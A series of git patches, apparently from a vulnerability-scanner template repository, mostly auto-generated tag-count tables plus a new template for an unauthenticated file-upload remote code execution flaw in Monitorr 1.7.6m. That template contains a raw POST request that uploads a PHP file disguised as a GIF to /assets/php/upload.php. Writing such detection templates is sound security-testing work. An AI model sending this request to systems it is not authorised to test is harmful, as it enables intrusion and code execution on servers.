1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| cve2007 | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | | bruteforce | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | | wifisky | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| cve2010 | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| cve2007 | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| igs | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | | mobileiron | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| linkerd | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| azure | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| targa | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| jsf | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | From b32ccad2c8e7ff398c39801d9429422e8cb87c87 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 20 Jul 2021 08:20:18 +0900 Subject: [PATCH 0913/4083] Create monitorr-rce.yaml This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr. Signed-off-by: GwanYeong Kim --- vulnerabilities/other/monitorr-rce.yaml | 51 +++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 vulnerabilities/other/monitorr-rce.yaml diff --git a/vulnerabilities/other/monitorr-rce.yaml b/vulnerabilities/other/monitorr-rce.yaml new file mode 100644 index 0000000000..86f592d6d9 --- /dev/null +++ b/vulnerabilities/other/monitorr-rce.yaml @@ -0,0 +1,51 @@ +id: monitorr-rce + +info: + name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr. + reference: | + - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ + - https://www.exploit-db.com/exploits/48980 + tags: monitorr,rce,oob + +requests: + - raw: + - | + POST /assets/php/upload.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 + Accept-Encoding: gzip, deflate + Accept: text/plain, */*; q=0.01 + Connection: close + Accept-Language: en-US,en;q=0.5 + X-Requested-With: XMLHttpRequest + Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745 + Origin: http://{{Hostname}} + Referer: http://{{Hostname}} + Content-Length: 319 + + -----------------------------31046105003900160576454225745 + Content-Disposition: form-data; name="fileToUpload"; filename="nuclei_poc.php" + Content-Type: image/gif + + GIF89a213213123 Date: Mon, 19 Jul 2021 23:21:29 +0000 Subject: [PATCH 0914/4083] Auto Generated Templates Stats [Mon Jul 19 23:21:29 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1125 +++++++++++++++++++++--------------------- 2 files changed, 564 insertions(+), 563 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index e29c8178d0..89fb334609 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":464},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":165},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":110},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"cve2021","count":71},{"name":"takeover","count":71},{"name":"token","count":63},{"name":"cve2018","count":62},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"iot","count":33},{"name":"network","count":32},{"name":"sqli","count":29},{"name":"oracle","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"oob","count":24},{"name":"logs","count":24},{"name":"disclosure","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"cisco","count":15},{"name":"listing","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"debug","count":13},{"name":"cve2015","count":13},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":11},{"name":"zoho","count":11},{"name":"dns","count":11},{"name":"springboot","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"magento","count":9},{"name":"jenkins","count":9},{"name":"cve2012","count":9},{"name":"dlink","count":9},{"name":"adobe","count":8},{"name":"aws","count":8},{"name":"php","count":8},{"name":"cve2013","count":8},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"cve2014","count":7},{"name":"vmware","count":7},{"name":"cms","count":6},{"name":"xxe","count":6},{"name":"backup","count":6},{"name":"nginx","count":6},{"name":"rails","count":6},{"name":"google","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"ruijie","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"confluence","count":5},{"name":"headless","count":5},{"name":"laravel","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"dell","count":5},{"name":"lucee","count":5},{"name":"login","count":5},{"name":"jetty","count":5},{"name":"solr","count":5},{"name":"nodejs","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"fileupload","count":4},{"name":"jolokia","count":4},{"name":"webserver","count":4},{"name":"magmi","count":4},{"name":"asp","count":4},{"name":"ibm","count":4},{"name":"tomcat","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"hongdian","count":4},{"name":"router","count":4},{"name":"django","count":4},{"name":"elastic","count":4},{"name":"thinkphp","count":4},{"name":"docker","count":4},{"name":"netgear","count":4},{"name":"cve2009","count":4},{"name":"vpn","count":4},{"name":"traversal","count":4},{"name":"samsung","count":4},{"name":"springcloud","count":3},{"name":"lfr","count":3},{"name":"dedecms","count":3},{"name":"git","count":3},{"name":"printer","count":3},{"name":"nosqli","count":3},{"name":"nacos","count":3},{"name":"slack","count":3},{"name":"resin","count":3},{"name":"vbulletin","count":3},{"name":"bypass","count":3},{"name":"mongodb","count":3},{"name":"ssh","count":3},{"name":"fanruan","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"deserialization","count":3},{"name":"windows","count":3},{"name":"openssh","count":3},{"name":"ebs","count":3},{"name":"kubernetes","count":3},{"name":"amazon","count":3},{"name":"crlf","count":3},{"name":"log","count":3},{"name":"kafka","count":3},{"name":"r-seenet","count":3},{"name":"microstrategy","count":3},{"name":"backups","count":3},{"name":"ofbiz","count":3},{"name":"caucho","count":3},{"name":"terramaster","count":3},{"name":"grafana","count":3},{"name":"cve2008","count":2},{"name":"intrusive","count":2},{"name":"rockmongo","count":2},{"name":"seeyon","count":2},{"name":"proxy","count":2},{"name":"nexus","count":2},{"name":"zhiyuan","count":2},{"name":"sonarqube","count":2},{"name":"huawei","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"vrealize","count":2},{"name":"httpd","count":2},{"name":"natshell","count":2},{"name":"hashicorp","count":2},{"name":"pega","count":2},{"name":"hjtcloud","count":2},{"name":"ecology","count":2},{"name":"coldfusion","count":2},{"name":"trixbox","count":2},{"name":"rstudio","count":2},{"name":"sonicwall","count":2},{"name":"ucmdb","count":2},{"name":"exposures","count":2},{"name":"mail","count":2},{"name":"service","count":2},{"name":"couchdb","count":2},{"name":"fortios","count":2},{"name":"openfire","count":2},{"name":"mida","count":2},{"name":"icewarp","count":2},{"name":"leak","count":2},{"name":"yapi","count":2},{"name":"jboss","count":2},{"name":"cache","count":2},{"name":"dos","count":2},{"name":"prometheus","count":2},{"name":"bigip","count":2},{"name":"telerik","count":2},{"name":"rockethchat","count":2},{"name":"paloalto","count":2},{"name":"activemq","count":2},{"name":"microsoft","count":2},{"name":"flir","count":2},{"name":"xxljob","count":2},{"name":"idrac","count":2},{"name":"odoo","count":2},{"name":"kibana","count":2},{"name":"emerge","count":2},{"name":"strapi","count":2},{"name":"globalprotect","count":2},{"name":"maian","count":2},{"name":"webcam","count":2},{"name":"wordfence","count":2},{"name":"openam","count":2},{"name":"nextjs","count":2},{"name":"chamilo","count":2},{"name":"splunk","count":2},{"name":"keycloak","count":2},{"name":"showdoc","count":2},{"name":"sharepoint","count":2},{"name":"shellshock","count":2},{"name":"zabbix","count":2},{"name":"hpe","count":2},{"name":"smtp","count":2},{"name":"smb","count":2},{"name":"frp","count":2},{"name":"hp","count":2},{"name":"saltstack","count":2},{"name":"spark","count":2},{"name":"kentico","count":2},{"name":"glassfish","count":2},{"name":"waf","count":2},{"name":"jellyfin","count":2},{"name":"voipmonitor","count":2},{"name":"bitrix","count":2},{"name":"nagios","count":2},{"name":"oauth","count":2},{"name":"synnefo","count":1},{"name":"jsp","count":1},{"name":"salesforce","count":1},{"name":"myucms","count":1},{"name":"postgres","count":1},{"name":"octobercms","count":1},{"name":"dotnet","count":1},{"name":"landray","count":1},{"name":"mediumish","count":1},{"name":"portainer","count":1},{"name":"spectracom","count":1},{"name":"tpshop","count":1},{"name":"node-red-dashboard","count":1},{"name":"cloudflare","count":1},{"name":"cocoon","count":1},{"name":"plugin","count":1},{"name":"zookeeper","count":1},{"name":"faraday","count":1},{"name":"ec2","count":1},{"name":"zm","count":1},{"name":"visionhub","count":1},{"name":"uwsgi","count":1},{"name":"bruteforce","count":1},{"name":"selea","count":1},{"name":"mongo","count":1},{"name":"javamelody","count":1},{"name":"idemia","count":1},{"name":"emby","count":1},{"name":"sco","count":1},{"name":"horde","count":1},{"name":"symfony","count":1},{"name":"netdata","count":1},{"name":"mcafee","count":1},{"name":"opm","count":1},{"name":"zeroshell","count":1},{"name":"email","count":1},{"name":"geddy","count":1},{"name":"centos","count":1},{"name":"jquery","count":1},{"name":"esmtp","count":1},{"name":"chinaunicom","count":1},{"name":"smartsense","count":1},{"name":"metinfo","count":1},{"name":"wavemaker","count":1},{"name":"erp-nc","count":1},{"name":"domxss","count":1},{"name":"ntopng","count":1},{"name":"exchange","count":1},{"name":"wazuh","count":1},{"name":"tapestry","count":1},{"name":"cve2005","count":1},{"name":"mantisbt","count":1},{"name":"status","count":1},{"name":"mirai","count":1},{"name":"viewpoint","count":1},{"name":"realteo","count":1},{"name":"empirecms","count":1},{"name":"rmc","count":1},{"name":"clave","count":1},{"name":"discourse","count":1},{"name":"xdcms","count":1},{"name":"razor","count":1},{"name":"turbocrm","count":1},{"name":"extractor","count":1},{"name":"nc2","count":1},{"name":"yachtcontrol","count":1},{"name":"huijietong","count":1},{"name":"szhe","count":1},{"name":"vsphere","count":1},{"name":"rabbitmq","count":1},{"name":"cse","count":1},{"name":"apiman","count":1},{"name":"pgadmin","count":1},{"name":"xiuno","count":1},{"name":"axis","count":1},{"name":"landrayoa","count":1},{"name":"rsyncd","count":1},{"name":"fiori","count":1},{"name":"nsasg","count":1},{"name":"diris","count":1},{"name":"etouch","count":1},{"name":"zzzcms","count":1},{"name":"beanshell","count":1},{"name":"cors","count":1},{"name":"timeclock","count":1},{"name":"tileserver","count":1},{"name":"rfi","count":1},{"name":"stem","count":1},{"name":"javascript","count":1},{"name":"hasura","count":1},{"name":"fastcgi","count":1},{"name":"jeewms","count":1},{"name":"expn","count":1},{"name":"firebase","count":1},{"name":"2014","count":1},{"name":"cgi","count":1},{"name":"triconsole","count":1},{"name":"avalanche","count":1},{"name":"primetek","count":1},{"name":"tamronos","count":1},{"name":"enumeration","count":1},{"name":"hadoop","count":1},{"name":"netrc","count":1},{"name":"pacsone","count":1},{"name":"itop","count":1},{"name":"pippoint","count":1},{"name":"phpinfo","count":1},{"name":"fortigate","count":1},{"name":"linksys","count":1},{"name":"cve2010","count":1},{"name":"pulsesecure","count":1},{"name":"acexy","count":1},{"name":"wifisky","count":1},{"name":"krweb","count":1},{"name":"panabit","count":1},{"name":"spf","count":1},{"name":"svn","count":1},{"name":"kyan","count":1},{"name":"moinmoin","count":1},{"name":"ulterius","count":1},{"name":"cobub","count":1},{"name":"svnserve","count":1},{"name":"dotnetnuke","count":1},{"name":"mpsec","count":1},{"name":"lotuscms","count":1},{"name":"nps","count":1},{"name":"majordomo2","count":1},{"name":"ruby","count":1},{"name":"plc","count":1},{"name":"skywalking","count":1},{"name":"opencast","count":1},{"name":"saltapi","count":1},{"name":"ricoh","count":1},{"name":"cve2007","count":1},{"name":"openerp","count":1},{"name":"azure","count":1},{"name":"oscommerce","count":1},{"name":"dlogin","count":1},{"name":"webftp","count":1},{"name":"blue-ocean","count":1},{"name":"dom","count":1},{"name":"sqlite","count":1},{"name":"robomongo","count":1},{"name":"appweb","count":1},{"name":"shopware","count":1},{"name":"linkedin","count":1},{"name":"adminer","count":1},{"name":"ssltls","count":1},{"name":"glances","count":1},{"name":"socomec","count":1},{"name":"parentlink","count":1},{"name":"klog","count":1},{"name":"wso2","count":1},{"name":"nordex","count":1},{"name":"mautic","count":1},{"name":"nette","count":1},{"name":"wp-theme","count":1},{"name":"wooyun","count":1},{"name":"viewlinc","count":1},{"name":"redhat","count":1},{"name":"gloo","count":1},{"name":"nuxeo","count":1},{"name":"jfrog","count":1},{"name":"optiLink","count":1},{"name":"xunchi","count":1},{"name":"vsftpd","count":1},{"name":"xff","count":1},{"name":"nomad","count":1},{"name":"csrf","count":1},{"name":"favicon","count":1},{"name":"rhymix","count":1},{"name":"redwood","count":1},{"name":"ambari","count":1},{"name":"maccmsv10","count":1},{"name":"scs","count":1},{"name":"ns","count":1},{"name":"bitly","count":1},{"name":"openstack","count":1},{"name":"haproxy","count":1},{"name":"clockwatch","count":1},{"name":"aspnuke","count":1},{"name":"fedora","count":1},{"name":"pyramid","count":1},{"name":"memcached","count":1},{"name":"linkerd","count":1},{"name":"ems","count":1},{"name":"woocomernce","count":1},{"name":"wmt","count":1},{"name":"mysql","count":1},{"name":"interlib","count":1},{"name":"timesheet","count":1},{"name":"alerta","count":1},{"name":"enum","count":1},{"name":"ioncube","count":1},{"name":"biometrics","count":1},{"name":"nexusdb","count":1},{"name":"acme","count":1},{"name":"octoprint","count":1},{"name":"floc","count":1},{"name":"kubeflow","count":1},{"name":"swagger","count":1},{"name":"arl","count":1},{"name":"sprintful","count":1},{"name":"ssl","count":1},{"name":"zcms","count":1},{"name":"calendarix","count":1},{"name":"dvr","count":1},{"name":"druid","count":1},{"name":"jmx","count":1},{"name":"spidercontrol","count":1},{"name":"sidekiq","count":1},{"name":"tensorboard","count":1},{"name":"k8","count":1},{"name":"bullwark","count":1},{"name":"upload","count":1},{"name":"rubedo","count":1},{"name":"openrestry","count":1},{"name":"grails","count":1},{"name":"jnoj","count":1},{"name":"javafaces","count":1},{"name":"traefik","count":1},{"name":"xml","count":1},{"name":"soar","count":1},{"name":"springframework","count":1},{"name":"sarg","count":1},{"name":"mdb","count":1},{"name":"sentry","count":1},{"name":"codeigniter","count":1},{"name":"k8s","count":1},{"name":"jenzabar","count":1},{"name":"zimbra","count":1},{"name":"embedthis","count":1},{"name":"phalcon","count":1},{"name":"fortiweb","count":1},{"name":"clusterengine","count":1},{"name":"tika","count":1},{"name":"gogs","count":1},{"name":"seacms","count":1},{"name":"payara","count":1},{"name":"bookstack","count":1},{"name":"aura","count":1},{"name":"nedi","count":1},{"name":"fuelcms","count":1},{"name":"fortigates","count":1},{"name":"avtech","count":1},{"name":"labtech","count":1},{"name":"discord","count":1},{"name":"anchorcms","count":1},{"name":"mailchimp","count":1},{"name":"kafdrop","count":1},{"name":"livezilla","count":1},{"name":"darkstat","count":1},{"name":"codemeter","count":1},{"name":"hortonworks","count":1},{"name":"crm","count":1},{"name":"opensmtpd","count":1},{"name":"sitecore","count":1},{"name":"node","count":1},{"name":"mongoshake","count":1},{"name":"db","count":1},{"name":"servicedesk","count":1},{"name":"wamp","count":1},{"name":"alibaba","count":1},{"name":"fortinet","count":1},{"name":"blackboard","count":1},{"name":"redis","count":1},{"name":"tongda","count":1},{"name":"plastic","count":1},{"name":"dompdf","count":1},{"name":"circontrol","count":1},{"name":"checkpoint","count":1},{"name":"harbor","count":1},{"name":"dvwa","count":1},{"name":"zmanda","count":1},{"name":"st","count":1},{"name":"csod","count":1},{"name":"duomicms","count":1},{"name":"rdp","count":1},{"name":"comodo","count":1},{"name":"episerver","count":1},{"name":"opentsdb","count":1},{"name":"servicenow","count":1},{"name":"igs","count":1},{"name":"setup","count":1},{"name":"kong","count":1},{"name":"eyou","count":1},{"name":"wuzhicms","count":1},{"name":"trilithic","count":1},{"name":"geutebruck","count":1},{"name":"blind","count":1},{"name":"targa","count":1},{"name":"fastapi","count":1},{"name":"circontrorl","count":1},{"name":"kerbynet","count":1},{"name":"upnp","count":1},{"name":"b2evolution","count":1},{"name":"zarafa","count":1},{"name":"netis","count":1},{"name":"mobileiron","count":1},{"name":"keenetic","count":1},{"name":"moin","count":1},{"name":"phpunit","count":1},{"name":"htmli","count":1},{"name":"wildfly","count":1},{"name":"heroku","count":1},{"name":"